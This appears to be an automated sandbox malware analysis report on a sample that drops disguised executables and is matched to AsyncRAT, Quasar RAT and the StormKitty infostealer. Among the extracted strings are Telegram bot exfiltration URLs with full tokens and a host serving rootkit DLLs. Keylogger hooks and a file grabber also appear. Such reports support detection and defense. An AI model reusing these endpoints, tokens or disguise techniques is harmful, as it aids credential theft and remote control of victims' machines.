                            Source: crack.exe, 00000002.00000002.2043779712.00000000028B6000.00000004.00000800.00020000.00000000.sdmp, Cracked.exe, 00000003.00000002.2039417306.00000000034AC000.00000004.00000800.00020000.00000000.sdmp, Cracked.exe, 00000003.00000002.2039417306.0000000003051000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.4469429984.0000000002D11000.00000004.00000800.00020000.00000000.sdmp, update.exe, 00000005.00000002.4469944759.0000000003495000.00000004.00000800.00020000.00000000.sdmp, Window Security.exe, 00000006.00000002.2843829214.00000000031DE000.00000004.00000800.00020000.00000000.sdmp, Windows Defender Service Host.exe, 00000007.00000002.4466004136.0000000003001000.00000004.00000800.00020000.00000000.sdmp, Windows Security.exe, 00000010.00000002.4466012118.0000000002504000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2245451019.00000000045B1000.00000004.00000800.00020000.00000000.sdmp, Windows Security Health Service.exe, 0000001A.00000002.4466271061.0000000002CA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                            Source: powershell.exe, 00000011.00000002.2245451019.0000000004706000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                            Source: Window Security.exe, 00000006.00000002.2843829214.0000000003244000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://us-east-1.route-1.000webhost.awex.io
                            Source: powershell.exe, 00000011.00000002.2245451019.0000000004706000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                            Source: Window Security.exe, 00000006.00000002.2843829214.0000000003262000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://a.optnmstr.com/app/js/api.min.js
                            Source: tmpFAD4.tmp.dat.5.dr, tmpFB36.tmp.dat.5.dr, tmpFB32.tmp.dat.4.dr, tmpFB84.tmp.dat.4.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                            Source: powershell.exe, 00000011.00000002.2245451019.00000000045B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                            Source: update.exe, 00000005.00000002.4469944759.00000000034EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.mylnikov.org
                            Source: update.exe, 00000005.00000002.4469944759.00000000034EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.mylnikov.org/geolocation/wifi?v=1.1&
                            Source: update.exe, 00000005.00000002.4469944759.00000000034EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.mylnikov.org/geolocation/wifi?v=1.1&bssid=
                            Source: update.exe, 00000005.00000002.4469944759.00000000034EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.mylnikov.org/geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15
                            Source: update.exe, 00000005.00000002.4469944759.00000000034EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.mylnikov.org/geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15d
                            Source: update.exe, 00000005.00000002.4469944759.00000000033D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.tele
                            Source: crack.exe, 00000002.00000002.2043779712.00000000028B6000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.4469429984.0000000002DB4000.00000004.00000800.00020000.00000000.sdmp, update.exe, 00000005.00000002.4469944759.000000000358F000.00000004.00000800.00020000.00000000.sdmp, update.exe, 00000005.00000002.4469944759.00000000035F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                            Source: svchost.exe.0.dr, crack.exe.0.drString found in binary or memory: https://api.telegram.org/bot
                            Source: svchost.exe, 00000004.00000002.4469429984.000000000300B000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000004.00000000.2005216319.00000000005B2000.00000002.00000001.01000000.00000008.sdmp, update.exe, 00000005.00000000.2006488022.0000000000C73000.00000002.00000001.01000000.0000000A.sdmp, update.exe.0.dr, svchost.exe.0.drString found in binary or memory: https://api.telegram.org/bot1119746739:AAGMhvpUjXI4CzIfizRC--VXilxnkJlhaf8/send
                            Source: svchost.exe, 00000004.00000002.4469429984.000000000300B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot1119746739:AAGMhvpUjXI4CzIfizRC--VXilxnkJlhaf8/sendDocument?chat_id=1096
                            Source: crack.exe, 00000002.00000002.2043779712.00000000028B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot5904946097:AAEb_US4tHY3ko2z9Y7a20zEv4AtQqZipKM/sendMessage?chat_id=58817
                            Source: update.exe, 00000005.00000002.4469944759.00000000035F6000.00000004.00000800.00020000.00000000.sdmp, update.exe, 00000005.00000002.4469944759.0000000003575000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7074211690:AAFHdtGIEk1j3FpHjh6_p8Xjh9rfZDo4uSc/sendMessage
                            Source: update.exe, 00000005.00000002.4469944759.00000000035F6000.00000004.00000800.00020000.00000000.sdmp, update.exe, 00000005.00000002.4469944759.0000000003575000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7074211690:AAFHdtGIEk1j3FpHjh6_p8Xjh9rfZDo4uSc/sendMessage?chat_id=62917
                            Source: svchost.exe, 00000004.00000002.4469429984.000000000300B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7479631857:AAFuIUMNJYKHzJ3Bc9t4FSh9ZQXlqymhFnk/sendDocument?chat_id=6291
Source: svchost.exe, 00000004.00000002.4469429984.0000000002DB4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot7479631857:AAFuIUMNJYKHzJ3Bc9t4FSh9ZQXlqymhFnk/sendMessage?chat_id=62917
Source: svchost.exe, 00000004.00000000.2005216319.00000000005B2000.00000002.00000001.01000000.00000008.sdmp, update.exe, 00000005.00000000.2006488022.0000000000C73000.00000002.00000001.01000000.0000000A.sdmp, update.exe.0.dr, svchost.exe.0.dr | String found in binary or memory: https://api.telegram.org/file/bot
Source: svchost.exe, 00000004.00000002.4469429984.0000000003032000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.4469429984.000000000300B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.orgD
Source: update.exe, 00000005.00000002.4469944759.00000000035F6000.00000004.00000800.00020000.00000000.sdmp, update.exe, 00000005.00000002.4469944759.0000000003575000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.orgd
Source: tmpFAD4.tmp.dat.5.dr, tmpFB36.tmp.dat.5.dr, tmpFB32.tmp.dat.4.dr, tmpFB84.tmp.dat.4.dr | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: tmpFAD4.tmp.dat.5.dr, tmpFB36.tmp.dat.5.dr, tmpFB32.tmp.dat.4.dr, tmpFB84.tmp.dat.4.dr | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: tmpFAD4.tmp.dat.5.dr, tmpFB36.tmp.dat.5.dr, tmpFB32.tmp.dat.4.dr, tmpFB84.tmp.dat.4.dr | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: powershell.exe, 00000011.00000002.2346034934.0000000005618000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000011.00000002.2346034934.0000000005618000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000011.00000002.2346034934.0000000005618000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: tmpFAD4.tmp.dat.5.dr, tmpFB36.tmp.dat.5.dr, tmpFB32.tmp.dat.4.dr, tmpFB84.tmp.dat.4.dr | String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: tmpFAD4.tmp.dat.5.dr, tmpFB36.tmp.dat.5.dr, tmpFB32.tmp.dat.4.dr, tmpFB84.tmp.dat.4.dr | String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: tmpFAD4.tmp.dat.5.dr, tmpFB36.tmp.dat.5.dr, tmpFB32.tmp.dat.4.dr, tmpFB84.tmp.dat.4.dr | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: Window Security.exe, 00000006.00000002.2843829214.0000000003262000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://fonts.googleapis.com/css?family=Roboto:400
Source: update.exe, 00000005.00000002.4469944759.00000000033D9000.00000004.00000800.00020000.00000000.sdmp, update.exe.0.dr, svchost.exe.0.dr | String found in binary or memory: https://github.com/LimerBoy/StormKitty
Source: svchost.exe, 00000004.00000002.4469429984.0000000002D11000.00000004.00000800.00020000.00000000.sdmp, update.exe, 00000005.00000002.4469944759.0000000002F61000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/LimerBoy/StormKitty0&eq
Source: update.exe, 00000005.00000002.4469944759.00000000033D9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/LimerBoy/StormKittyTC
Source: powershell.exe, 00000011.00000002.2245451019.0000000004706000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000011.00000002.2181111799.0000000000737000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://go.microP
Source: powershell.exe, 00000011.00000002.2181111799.0000000000737000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://go.microPackageManagementp
Source: powershell.exe, 00000011.00000002.2346034934.0000000005618000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
Source: Window Security.exe, 00000006.00000002.2843829214.00000000031FA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://payloads-poison.000webhostapp.com
Source: Window Security.exe, 00000006.00000002.2843829214.00000000031FA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://payloads-poison.000webhostapp.com/r77-x64.dll
Source: Window Security.exe, 00000006.00000000.2008053302.0000000000CE2000.00000002.00000001.01000000.0000000B.sdmp, Window Security.exe.0.dr, Windows Security.exe.6.dr | String found in binary or memory: https://payloads-poison.000webhostapp.com/r77-x64.dllkhttps://payloads-poison.000webhostapp.com/r77-
Source: Window Security.exe, 00000006.00000002.2843829214.00000000031FA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://payloads-poison.000webhostapp.com/r77-x86.dll
Source: svchost.exe, 00000004.00000000.2005216319.00000000005B2000.00000002.00000001.01000000.00000008.sdmp, update.exe, 00000005.00000000.2006488022.0000000000C73000.00000002.00000001.01000000.0000000A.sdmp, update.exe.0.dr, svchost.exe.0.dr | String found in binary or memory: https://raw.githubusercontent.com/LimerBoy/StormKitty/master/StormKitty/stub/packages/DotNetZip.1.13
Source: places.raw.5.dr | String found in binary or memory: https://support.mozilla.org
Source: places.raw.5.dr | String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: places.raw.5.dr | String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL
Source: Window Security.exe, 00000006.00000002.2843829214.0000000003262000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.000webhost.com/cpanel-login?utm_source=000&utm_medium=no-such-website&utm_campaign=pages
Source: Window Security.exe, 00000006.00000002.2843829214.000000000325E000.00000004.00000800.00020000.00000000.sdmp, Window Security.exe, 00000006.00000002.2843829214.0000000003262000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.000webhost.com/free-website-sign-up?utm_source=000webhost&utm_medium=frontend&utm_campai
Source: Window Security.exe, 00000006.00000002.2843829214.000000000325E000.00000004.00000800.00020000.00000000.sdmp, Window Security.exe, 00000006.00000002.2843829214.0000000003262000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.000webhost.com/static/default.000webhost.com/images/cdn/000webhost-logo-coral-pink.svg
Source: Window Security.exe, 00000006.00000002.2843829214.0000000003262000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.000webhost.com/static/default.000webhost.com/images/cdn/corgi-eating-a-cassette.svg
Source: Window Security.exe, 00000006.00000002.2843829214.000000000325E000.00000004.00000800.00020000.00000000.sdmp, Window Security.exe, 00000006.00000002.2843829214.0000000003262000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.000webhost.com/static/default.000webhost.com/images/cdn/corgi-make-a-website.svg
Source: Window Security.exe, 00000006.00000002.2843829214.000000000325E000.00000004.00000800.00020000.00000000.sdmp, Window Security.exe, 00000006.00000002.2843829214.0000000003262000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.000webhost.com/static/default.000webhost.com/images/cdn/corgi-upgrade-to-hostinger.svg
Source: Window Security.exe, 00000006.00000002.2843829214.000000000325E000.00000004.00000800.00020000.00000000.sdmp, Window Security.exe, 00000006.00000002.2843829214.0000000003262000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.000webhost.com/static/default.000webhost.com/images/cdn/corgi-with-shades.svg
Source: Window Security.exe, 00000006.00000002.2843829214.0000000003262000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.000webhost.com/static/default.000webhost.com/images/cdn/favicon.ico
Source: tmpFAD4.tmp.dat.5.dr, tmpFB36.tmp.dat.5.dr, tmpFB32.tmp.dat.4.dr, tmpFB84.tmp.dat.4.dr | String found in binary or memory: https://www.ecosia.org/newtab/
Source: Window Security.exe, 00000006.00000002.2843829214.0000000003262000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google-analytics.com/analytics.js
Source: tmpFAD4.tmp.dat.5.dr, tmpFB36.tmp.dat.5.dr, tmpFB32.tmp.dat.4.dr, tmpFB84.tmp.dat.4.dr | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: Window Security.exe, 00000006.00000002.2843829214.000000000325E000.00000004.00000800.00020000.00000000.sdmp, Window Security.exe, 00000006.00000002.2843829214.0000000003262000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.hostinger.com/special/000webhost?utm_source=000webhost&utm_medium=frontend&utm_campaign=
Source: crack.exe, 00000002.00000000.2003529884.0000000000442000.00000002.00000001.01000000.00000006.sdmp, crack.exe, 00000002.00000002.2043779712.0000000002851000.00000004.00000800.00020000.00000000.sdmp, crack.exe.0.dr | String found in binary or memory: https://www.ifconfig.me/
Source: places.raw.5.dr | String found in binary or memory: https://www.mozilla.org
Source: places.raw.5.dr | String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
Source: places.raw.5.dr | String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: svchost.exe, 00000004.00000002.4469429984.0000000002D11000.00000004.00000800.00020000.00000000.sdmp, update.exe, 00000005.00000002.4469944759.0000000002F61000.00000004.00000800.00020000.00000000.sdmp, History.txt.5.dr, History.txt.4.dr | String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/)
Source: update.exe, 00000005.00000002.4546117851.0000000003FA1000.00000004.00000800.00020000.00000000.sdmp, tmpFF81.tmp.dat.4.dr, tmpFFC0.tmp.dat.5.dr, places.raw.5.dr | String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: places.raw.5.dr | String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: update.exe, 00000005.00000002.4546117851.0000000003FA1000.00000004.00000800.00020000.00000000.sdmp, tmpFF81.tmp.dat.4.dr, tmpFFC0.tmp.dat.5.dr, places.raw.5.dr | String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: update.exe, 00000005.00000002.4546117851.0000000003FA1000.00000004.00000800.00020000.00000000.sdmp, tmpFF81.tmp.dat.4.dr, tmpFFC0.tmp.dat.5.dr, places.raw.5.dr | String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: unknown | Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown | Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown | Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49708 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.196.114:443 -> 192.168.2.5:49725 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.196.114:443 -> 192.168.2.5:49726 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49728 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49729 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: Yara match | File source: 0.2.BTC.exe.2c8fa48.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.0.Cracked.exe.d80000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.Cracked.exe.310b0a8.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.BTC.exe.2c8fa48.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.Cracked.exe.310b0a8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.0.update.exe.c60000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.0.svchost.exe.5b0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000003.00000002.2039417306.0000000003101000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000000.2006488022.0000000000C73000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000000.2004809524.0000000000D82000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000000.2005216319.00000000005B2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: svchost.exe PID: 1716, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: update.exe PID: 1632, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Roaming\Cracked.exe, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Roaming\update.exe, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Roaming\Windows Security Health Service.exe, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPED
Source: Yara match | File source: Process Memory Space: Cracked.exe PID: 5524, type: MEMORYSTR
Source: svchost.exe.0.dr, DesktopScreenshot.cs | .Net Code: Make
Source: update.exe.0.dr, .cs | .Net Code:
Source: Cracked.exe.0.dr, Keylogger.cs | .Net Code: KeyboardLayout
Source: svchost.exe.0.dr, Keylogger.cs | .Net Code: SetHook
Source: svchost.exe.0.dr, Keylogger.cs | .Net Code: KeyboardLayout
Source: Windows Defender Service Host.exe.0.dr, XLogger.cs | .Net Code: KeyboardLayout
Source: 0.2.BTC.exe.2c80488.2.raw.unpack, XLogger.cs | .Net Code: KeyboardLayout
Source: 0.2.BTC.exe.2c8fa48.3.raw.unpack, Keylogger.cs | .Net Code: KeyboardLayout
Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe | Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe
Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe | Window created: window name: CLIPBRDWNDCLASS

E-Banking Fraud

Source: Yara match | File source: 6.0.Window Security.exe.d0809a.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.0.Window Security.exe.d05295.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.0.Window Security.exe.ce0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000006.00000000.2008053302.0000000000CE2000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match | File source: C:\Users\user\AppData\Roaming\Window Security.exe, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe, type: DROPPED

Spam, unwanted Advertisements and Ransom Demands

Source: C:\Users\user\AppData\Roaming\svchost.exe | File deleted: C:\Users\user\AppData\Local\9493d1ccde8944e0fb5ffbe9b1372244\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Desktop\GIGIYTFFYT.jpg
Source: C:\Users\user\AppData\Roaming\svchost.exe | File deleted: C:\Users\user\AppData\Local\9493d1ccde8944e0fb5ffbe9b1372244\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Desktop\EEGWXUHVUG\BJZFPPWAPT.png
Source: C:\Users\user\AppData\Roaming\svchost.exe | File deleted: C:\Users\user\AppData\Local\9493d1ccde8944e0fb5ffbe9b1372244\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Desktop\EFOYFBOLXA\PALRGUCVEH.xlsx
Source: C:\Users\user\AppData\Roaming\svchost.exe | File deleted: C:\Users\user\AppData\Local\9493d1ccde8944e0fb5ffbe9b1372244\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Desktop\NVWZAPQSQL.docx
Source: C:\Users\user\AppData\Roaming\svchost.exe | File deleted: C:\Users\user\AppData\Local\9493d1ccde8944e0fb5ffbe9b1372244\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Desktop\NVWZAPQSQL.xlsx

Operating System Destruction

Source: C:\Users\user\AppData\Roaming\Cracked.exe | Process information set: 01 00 00 00
Source: C:\Users\user\AppData\Roaming\Cracked.exe | Process information set: 00 00 00 00
Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe | Process information set: 01 00 00 00
Source: C:\Users\user\AppData\Roaming\Windows Security Health Service.exe | Process information set: 01 00 00 00

System Summary

Source: 0.2.BTC.exe.2c80488.2.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT | Author: ditekSHen
Source: 0.2.BTC.exe.2c75848.1.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT | Author: ditekSHen
Source: 0.2.BTC.exe.2c8fa48.3.unpack, type: UNPACKEDPE | Matched rule: Detects executables attempting to enumerate video devices using WMI | Author: ditekSHen
Source: 3.0.Cracked.exe.d80000.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables attempting to enumerate video devices using WMI | Author: ditekSHen
Source: 3.2.Cracked.exe.310b0a8.1.unpack, type: UNPACKEDPE | Matched rule: Detects executables attempting to enumerate video devices using WMI | Author: ditekSHen
Source: 7.0.Windows Defender Service Host.exe.f60000.0.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT | Author: ditekSHen
Source: 0.2.BTC.exe.2c8fa48.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables attempting to enumerate video devices using WMI | Author: ditekSHen
Source: 3.2.Cracked.exe.310b0a8.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables attempting to enumerate video devices using WMI | Author: ditekSHen
Source: 0.2.BTC.exe.2c80488.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables attempting to enumerate video devices using WMI | Author: ditekSHen
Source: 0.2.BTC.exe.2c80488.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT | Author: ditekSHen
Source: 0.2.BTC.exe.2c75848.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables attempting to enumerate video devices using WMI | Author: ditekSHen
Source: 0.2.BTC.exe.2c75848.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT | Author: ditekSHen
Source: 5.0.update.exe.c60000.0.unpack, type: UNPACKEDPE | Matched rule: Detects file containing reversed ASEP Autorun registry keys | Author: ditekSHen
Source: 5.0.update.exe.c60000.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Discord tokens regular expressions | Author: ditekSHen
Source: 5.0.update.exe.c60000.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing many VPN software clients. Observed in infostealers | Author: ditekSHen
Source: 5.0.update.exe.c60000.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers | Author: ditekSHen
Source: 6.0.Window Security.exe.d0809a.2.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Quasarrat_e52df647 | Author: unknown
Source: 6.0.Window Security.exe.d0809a.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Quasar RAT | Author: Florian Roth
Source: 6.0.Window Security.exe.d0809a.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Quasar RAT | Author: Florian Roth
Source: 6.0.Window Security.exe.d0809a.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects QuasarRAT malware | Author: Florian Roth
Source: 6.0.Window Security.exe.d0809a.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Vermin Keylogger | Author: Florian Roth
Source: 6.0.Window Security.exe.d0809a.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Patchwork malware | Author: Florian Roth
Source: 6.0.Window Security.exe.d0809a.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects malware from disclosed CN malware set | Author: Florian Roth
Source: 6.0.Window Security.exe.d0809a.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware | Author: Florian Roth
Source: 6.0.Window Security.exe.d0809a.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables containing artifacts associated with disabling Windows Defender | Author: ditekSHen
Source: 6.0.Window Security.exe.d0809a.2.raw.unpack, type: UNPACKEDPE | Matched rule: QuasarRAT payload | Author: ditekSHen
Source: 4.0.svchost.exe.5b0000.0.unpack, type: UNPACKEDPE | Matched rule: Detects file containing reversed ASEP Autorun registry keys | Author: ditekSHen
Source: 4.0.svchost.exe.5b0000.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Discord tokens regular expressions | Author: ditekSHen
Source: 4.0.svchost.exe.5b0000.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing many VPN software clients. Observed in infostealers | Author: ditekSHen
Source: 4.0.svchost.exe.5b0000.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers | Author: ditekSHen
Source: 4.0.svchost.exe.5b0000.0.unpack, type: UNPACKEDPE | Matched rule: Detects StormKitty infostealer | Author: ditekSHen
Source: 6.0.Window Security.exe.d05295.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Quasarrat_e52df647 | Author: unknown
Source: 6.0.Window Security.exe.d05295.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Quasar RAT | Author: Florian Roth
Source: 6.0.Window Security.exe.d05295.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Quasar RAT | Author: Florian Roth
Source: 6.0.Window Security.exe.d05295.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects QuasarRAT malware | Author: Florian Roth
Source: 6.0.Window Security.exe.d05295.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Vermin Keylogger | Author: Florian Roth
Source: 6.0.Window Security.exe.d05295.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Patchwork malware | Author: Florian Roth
Source: 6.0.Window Security.exe.d05295.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects malware from disclosed CN malware set | Author: Florian Roth
Source: 6.0.Window Security.exe.d05295.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware | Author: Florian Roth
Source: 6.0.Window Security.exe.d05295.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables containing artifacts associated with disabling Windows Defender | Author: ditekSHen
Source: 6.0.Window Security.exe.d05295.1.raw.unpack, type: UNPACKEDPE | Matched rule: QuasarRAT payload | Author: ditekSHen
Source: 6.0.Window Security.exe.ce0000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Quasarrat_e52df647 | Author: unknown
Source: 6.0.Window Security.exe.ce0000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Quasar RAT | Author: Florian Roth
